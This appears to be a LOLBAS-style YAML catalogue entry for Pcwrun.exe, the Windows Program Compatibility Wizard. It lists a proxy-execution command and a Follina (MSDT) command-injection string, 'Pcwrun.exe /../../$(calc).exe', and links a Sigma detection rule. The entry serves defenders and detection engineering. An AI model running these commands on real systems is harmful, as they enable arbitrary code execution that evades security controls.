---
Name: Pcwrun.exe
Description: Program Compatibility Wizard
Author: 'Oddvar Moe'
Created: 2018-05-25
Commands:
  - Command: Pcwrun.exe c:\temp\beacon.exe
    Description: Open the target .EXE file with the Program Compatibility Wizard.
    Usecase: Proxy execution of binary
    Category: Execute
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
  - Command: Pcwrun.exe /../../$(calc).exe
    Description: Leverage the MSDT Follina vulnerability through Pcwrun to execute arbitrary commands and binaries. Note that this specific technique will not work on a system patched with the June 2022 Windows Security update.
    Usecase: Proxy execution of binary
    Category: Execute
    Privileges: User
    MitreID: T1202
    OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
  - Path: C:\Windows\System32\pcwrun.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_pcwrun_follina.yml
Resources:
  - Link: https://twitter.com/pabraeken/status/991335019833708544
  - Link: https://twitter.com/nas_bench/status/1535663791362519040
Acknowledgement:
  - Person: Pierre-Alexandre Braeken
    Handle: '@pabraeken'
  - Person: Nasreddine Bencherchali
    Handle: '@nas_bench'